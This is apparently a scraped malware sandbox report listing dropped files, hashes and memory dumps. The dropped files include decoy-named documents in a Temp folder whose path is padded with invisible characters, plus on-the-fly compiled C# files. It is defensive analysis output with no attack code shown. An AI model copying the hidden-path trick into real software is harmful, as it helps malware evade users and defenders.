C:\Users\Admin\AppData\Local\Temp\ ‍ ‍‍ ‎ \Common Files\Documents\ResumePublish.doc

Filesize
290KB

MD5
c9041f529d307ee23d6e69989a67c482

SHA1
bd375cba6e5e6953c99ef21be520c95e2e80e7cb

SHA256
1f9b75d8a9f9606f586cb1edfcb31ab2a76c7ce0dca89002b05df1a9138dfebf

SHA512
4449f51bd3d29c2a05a5bc047144888c59590d4d43128017c0de8dde6b833c86390399adfb53694c4bfd247d45ff9e7c4930680960ccdd478f152650fffaa097

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍‍ ‎ \Common Files\Documents\SaveDebug.xlsx

Filesize
9KB

MD5
c88b01ecbfa527bad58fa3b9a2d32ab4

SHA1
f3e9f5db5f1ce56aebe3295b7c5b57611859eeb1

SHA256
8767153f70016f12c0a31d4cc578270a246f5a95f4f63e7d146c656c52f145e4

SHA512
8032d386014048a16b53ecfff77b6ee4a9c81f92e615c63d4191294586d2bced4463d364c0685fde70af4f1e29cc13b43b92cc7957dcec927c563ca3ce5ef042

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oak4alyf\CSCD779DCA8C8D4669BB445F805A3597.TMP

Filesize
652B

MD5
b7044b4e36022e434ff9d9db0559e2be

SHA1
215f4b38c0071c35cce7b4bcdbd52e88f0a2d2d1

SHA256
aef7bc6b92ecb90e8a5228fba7c61c78ee76cdb145e19c0cc53e5d44f17dfc47

SHA512
e99754b1765213c1ed15933ef6bbf39f3e1f1503d52aa961d7b991451fdb1ae08ef4865ee0b31746fc58f3727824ac5448a7f9728dce0852135cbae4e1c6706c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oak4alyf\oak4alyf.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oak4alyf\oak4alyf.cmdline

Filesize
607B

MD5
49e6464145b3094008936b6b929ff352

SHA1
5025f3f3ccd5ffde6b1c3223dd7f86277aa89a4a

SHA256
4fa9da1f731e37078c56b63126ec968d37a1b9ad874b5f3748df96134ed5d9e0

SHA512
763eb18f94b9855d79387d01512b1da67020a627a76d6214059d4948e047c926e8919990c30beaed8c84140e03461f4a6048f9b7826b407ea9553f064a65bb60

Download Submit
memory/2072-228-0x0000016793710000-0x0000016793718000-memory.dmp

Filesize
32KB

Download
memory/4556-86-0x00007FFECF320000-0x00007FFECFDE1000-memory.dmp

Filesize
10.8MB

Download
memory/4556-84-0x00007FFECF320000-0x00007FFECFDE1000-memory.dmp

Filesize
10.8MB

Download
memory/4556-87-0x0000018FFFA90000-0x0000018FFFAB2000-memory.dmp

Filesize
136KB

Download
memory/4556-83-0x00007FFECF323000-0x00007FFECF325000-memory.dmp

Filesize
8KB

Download
memory/4556-241-0x00007FFECF320000-0x00007FFECFDE1000-memory.dmp

Filesize
10.8MB

Download
memory/4772-81-0x00007FFEDB140000-0x00007FFEDB164000-memory.dmp

Filesize
144KB

Download
memory/4772-72-0x000002350E050000-0x000002350E579000-memory.dmp

Filesize
5.2MB

Download
memory/4772-79-0x00007FFEDD130000-0x00007FFEDD13D000-memory.dmp

Filesize
52KB

Download
memory/4772-48-0x00007FFEE9520000-0x00007FFEE952F000-memory.dmp

Filesize
60KB

Download
memory/4772-70-0x00007FFED1080000-0x00007FFED1745000-memory.dmp

Filesize
6.8MB

Download
memory/4772-29-0x00007FFEE5160000-0x00007FFEE5185000-memory.dmp

Filesize
148KB

Download
memory/4772-25-0x00007FFED1080000-0x00007FFED1745000-memory.dmp

Filesize
6.8MB

Download
memory/4772-309-0x00007FFED7380000-0x00007FFED73B3000-memory.dmp

Filesize
204KB

Download
memory/4772-85-0x00007FFED0E40000-0x00007FFED0FBE000-memory.dmp

Filesize
1.5MB

Download
memory/4772-315-0x000002350E050000-0x000002350E579000-memory.dmp

Filesize
5.2MB

Download
memory/4772-314-0x00007FFED0B80000-0x00007FFED0C4D000-memory.dmp

Filesize
820KB

Download
memory/4772-82-0x00007FFED0530000-0x00007FFED064B000-memory.dmp

Filesize
1.1MB

Download
memory/4772-76-0x00007FFEDC2F0000-0x00007FFEDC304000-memory.dmp

Filesize
80KB

Download
memory/4772-78-0x00007FFEDD140000-0x00007FFEDD16D000-memory.dmp

Filesize
180KB

Download
memory/4772-73-0x00007FFED0650000-0x00007FFED0B79000-memory.dmp

Filesize
5.2MB

Download
memory/4772-74-0x00007FFEE5160000-0x00007FFEE5185000-memory.dmp

Filesize
148KB

Download
memory/4772-71-0x00007FFED0B80000-0x00007FFED0C4D000-memory.dmp

Filesize
820KB

Download
memory/4772-63-0x00007FFEDD200000-0x00007FFEDD219000-memory.dmp

Filesize
100KB

Download
memory/4772-66-0x00007FFED7380000-0x00007FFED73B3000-memory.dmp

Filesize
204KB

Download
memory/4772-64-0x00007FFEE0490000-0x00007FFEE049D000-memory.dmp

Filesize
52KB

Download
memory/4772-60-0x00007FFED0E40000-0x00007FFED0FBE000-memory.dmp

Filesize
1.5MB

Download
memory/4772-57-0x00007FFEE6470000-0x00007FFEE648A000-memory.dmp

Filesize
104KB

Download
memory/4772-58-0x00007FFEDB140000-0x00007FFEDB164000-memory.dmp

Filesize
144KB

Download
memory/4772-54-0x00007FFEDD140000-0x00007FFEDD16D000-memory.dmp

Filesize
180KB

Download
memory/4772-330-0x00007FFED0650000-0x00007FFED0B79000-memory.dmp

Filesize
5.2MB

Download